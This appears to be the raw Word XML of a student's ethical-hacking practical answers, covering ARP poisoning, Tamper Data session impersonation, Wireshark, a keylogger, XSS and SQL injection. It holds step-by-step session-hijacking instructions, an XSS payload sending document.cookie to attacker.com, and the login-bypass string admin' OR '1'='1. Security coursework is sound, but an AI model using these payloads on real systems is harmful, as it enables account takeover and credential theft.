    <w:p w14:paraId="4C7493CC" w14:textId="6380A08B" w:rsidR="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidR="00DF79EE" w:rsidRPr="00DF79EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use ARP poisoning to crack password of email account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309DDFE8" w14:textId="47BE7ABE" w:rsidR="00DF79EE" w:rsidRDefault="00DF79EE" w:rsidP="00B318A2">
      <w:r>
        <w:t>A. Practical number 3(B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B70489" w14:textId="39E9E452" w:rsidR="00DF79EE" w:rsidRDefault="007A645E" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A645E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Install and configure the Tamper Data add-on in Firefox. Intercept and modify HTTP requests to impersonate a user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B60A9" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>A. Step 1: Install Firefox Version 56 or Older (for Tamper Data Compatibility)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146819D3" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Uninstall your current version of Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E1DC9" w14:textId="77777777" w:rsidR="00794B7F" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Download Firefox 56 (or an older version) from Mozilla's FTP archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA768B" w14:textId="145502EE" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Install Firefox 56 and open the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD37D42" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Step 2: Install Tamper Data Add-on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257919C8" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Open Firefox 56.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF5AFF" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Go to the Tamper Data add-on page on Mozilla’s add-ons website (note that Tamper Data is no longer available in the newer versions of Firefox).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028B41F" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>You may need to enable installing older add-ons by going to the Add-ons menu and checking for the Tamper Data add-on under "Legacy" add-ons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC07C8" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Click on Add to Firefox to install it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681550A" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Step 3: Open Tamper Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA86601" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>After installation, you will find Tamper Data in the Firefox toolbar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B1D5A" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Click on the Tamper Data icon to open its interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB83F2" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>A prompt will appear asking you if you want to start tampering—click "Start."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE91B1" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Step 4: Intercept HTTP Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2814DC" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Now, when you load a page, Tamper Data will show you all outgoing HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B0CE1" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>When a request is sent (for example, a form submission), Tamper Data will pause it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E872C17" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>You can edit headers, modify cookies, or change parameters before sending the request to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76E0BE" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Modify Request Headers: For impersonating users, modify headers like Authorization, Cookie, or User-Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C4723" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Modify Request Body: Modify data being sent in the request (for example, changing form inputs or POST data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33819B" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Step 5: Impersonate a User's Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFE023" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Find the request that corresponds to a login or authentication process (e.g., POST /login).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC0C88" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>Modify the Cookie or Authorization header to reflect the session of a logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F7FF6" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>After modifying the request, click Submit to send the modified request to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1811E5" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7359FB" w14:textId="77777777" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After the request is submitted, you can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the response returned by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA97B3" w14:textId="4D815450" w:rsidR="007A645E" w:rsidRDefault="007A645E" w:rsidP="007A645E">
      <w:r>
        <w:t>If successful, you should be able to see how the server responds to your modified session or user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD53BFD" w14:textId="77777777" w:rsidR="00787DD0" w:rsidRDefault="00787DD0" w:rsidP="007A645E"/>
    <w:p w14:paraId="26EEEACF" w14:textId="496DC05F" w:rsidR="00787DD0" w:rsidRDefault="00787DD0" w:rsidP="007A645E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="00787DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstrate the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00787DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00787DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in sniffing the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983EDF4" w14:textId="177F8797" w:rsidR="00787DD0" w:rsidRDefault="00787DD0" w:rsidP="007A645E">
      <w:r w:rsidRPr="00787DD0">
        <w:t>A.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00830801">
        <w:t>Practical Number 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FD043" w14:textId="77777777" w:rsidR="00830801" w:rsidRDefault="00830801" w:rsidP="007A645E"/>
    <w:p w14:paraId="66332EF1" w14:textId="77777777" w:rsidR="00830801" w:rsidRDefault="00830801" w:rsidP="007A645E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7538A249" w14:textId="5A4A0F20" w:rsidR="00830801" w:rsidRDefault="00830801" w:rsidP="007A645E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="00830801">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create simple keylogger using python and record keys used by user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4FB482" w14:textId="3AF5FE4D" w:rsidR="00830801" w:rsidRDefault="00830801" w:rsidP="007A645E">
      <w:r>
        <w:t>A. Keylogger attached file with folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6952F" w14:textId="77777777" w:rsidR="00723E71" w:rsidRDefault="00723E71" w:rsidP="007A645E"/>
    <w:p w14:paraId="1BA65DB2" w14:textId="4314B23E" w:rsidR="00723E71" w:rsidRDefault="004A68FE" w:rsidP="007A645E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A68FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform Cross Site Scripting attack to change content of Session Cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED7CC1" w14:textId="77777777" w:rsidR="00517A07" w:rsidRDefault="004A68FE" w:rsidP="007A645E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Practical Number </w:t>
      </w:r>
      <w:r w:rsidR="00517A07">
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54B916" w14:textId="77660C29" w:rsidR="004A68FE" w:rsidRDefault="00517A07" w:rsidP="007A645E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517A07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBDBFFB" w14:textId="6A7E24BB" w:rsidR="004346DF" w:rsidRPr="004A68FE" w:rsidRDefault="004346DF" w:rsidP="007A645E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Follow steps from mam pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17702CFA" w14:textId="77777777" w:rsidR="00517A07" w:rsidRPr="00517A07" w:rsidRDefault="00517A07" w:rsidP="00517A07">
      <w:r w:rsidRPr="00517A07">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A2880" w14:textId="77777777" w:rsidR="00517A07" w:rsidRPr="00517A07" w:rsidRDefault="00517A07" w:rsidP="00517A07">
      <w:r w:rsidRPr="00517A07">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00517A07">
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00517A07">
        <w:t>='http://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00517A07">
        <w:t>steal?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00517A07">
        <w:t xml:space="preserve">=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00517A07">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00517A07">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABEF1AC" w14:textId="7A708A79" w:rsidR="00830801" w:rsidRDefault="00517A07" w:rsidP="00517A07">
      <w:r w:rsidRPr="00517A07">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5440B7" w14:textId="422B0540" w:rsidR="00517A07" w:rsidRDefault="00517A07" w:rsidP="00517A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517A07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F07835" w:rsidRPr="00F07835">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform SQL Injection and retrieve the user names and passwords from the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629A0B3" w14:textId="7A7374E2" w:rsidR="00F07835" w:rsidRDefault="00F07835" w:rsidP="00517A07">
      <w:r>
        <w:t xml:space="preserve">A. Practical Number 8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09DFE8" w14:textId="46E3F506" w:rsidR="00F07835" w:rsidRDefault="00F07835" w:rsidP="00517A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07835">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526C67C" w14:textId="77777777" w:rsidR="004346DF" w:rsidRPr="004A68FE" w:rsidRDefault="004346DF" w:rsidP="004346DF">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Follow steps from mam pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD52C6" w14:textId="1492CA22" w:rsidR="005E48AA" w:rsidRDefault="004346DF" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004346DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01119EB7" w14:textId="77777777" w:rsidR="00E94EFB" w:rsidRDefault="00E94EFB" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FC5820" w14:textId="77777777" w:rsidR="00E94EFB" w:rsidRDefault="00E94EFB" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3779AB" w14:textId="77777777" w:rsidR="00F07835" w:rsidRPr="00563B1F" w:rsidRDefault="00F07835" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F07835" w:rsidRPr="0056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B0212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="346E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D6"/>
    <w:rsid w:val="00077970"/>
    <w:rsid w:val="000A594A"/>
    <w:rsid w:val="001F334E"/>
    <w:rsid w:val="002C1C31"/>
    <w:rsid w:val="002F224B"/>
    <w:rsid w:val="0030319C"/>
    <w:rsid w:val="003154D6"/>
    <w:rsid w:val="00342B4E"/>
    <w:rsid w:val="003D2DDA"/>
    <w:rsid w:val="004346DF"/>
    <w:rsid w:val="0045273C"/>
    <w:rsid w:val="004A68FE"/>
    <w:rsid w:val="004F6396"/>
    <w:rsid w:val="00517A07"/>
    <w:rsid w:val="00563B1F"/>
    <w:rsid w:val="005E48AA"/>
    <w:rsid w:val="00662B17"/>
    <w:rsid w:val="00675356"/>
    <w:rsid w:val="006A4747"/>
    <w:rsid w:val="006F32EC"/>
    <w:rsid w:val="00723E71"/>
    <w:rsid w:val="00775CE8"/>
    <w:rsid w:val="00787DD0"/>
    <w:rsid w:val="00794B7F"/>
    <w:rsid w:val="007A645E"/>
    <w:rsid w:val="00830801"/>
    <w:rsid w:val="008C14A7"/>
    <w:rsid w:val="008C2A63"/>
    <w:rsid w:val="00972934"/>
    <w:rsid w:val="009760EC"/>
    <w:rsid w:val="009C4F6F"/>
    <w:rsid w:val="00A459FA"/>
    <w:rsid w:val="00A5079D"/>
    <w:rsid w:val="00A81CFE"/>
    <w:rsid w:val="00B318A2"/>
    <w:rsid w:val="00BC2BE0"/>
    <w:rsid w:val="00BC656E"/>
    <w:rsid w:val="00CF0EFE"/>
    <w:rsid w:val="00D44771"/>
    <w:rsid w:val="00D978A8"/>
    <w:rsid w:val="00DB592D"/>
    <w:rsid w:val="00DF79EE"/>
    <w:rsid w:val="00E36084"/>
    <w:rsid w:val="00E86982"/>
    <w:rsid w:val="00E94EFB"/>
    <w:rsid w:val="00F07835"/>
    <w:rsid w:val="00F56E83"/>
    <w:rsid w:val="00F87DA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4763"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{31809C11-2051-4AC9-8304-FAA377AF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DF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00315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4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tasho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stasho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ho.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aryanpalekar1105@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>aryanpalekar1105@gmail.com</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T19:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-22T20:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>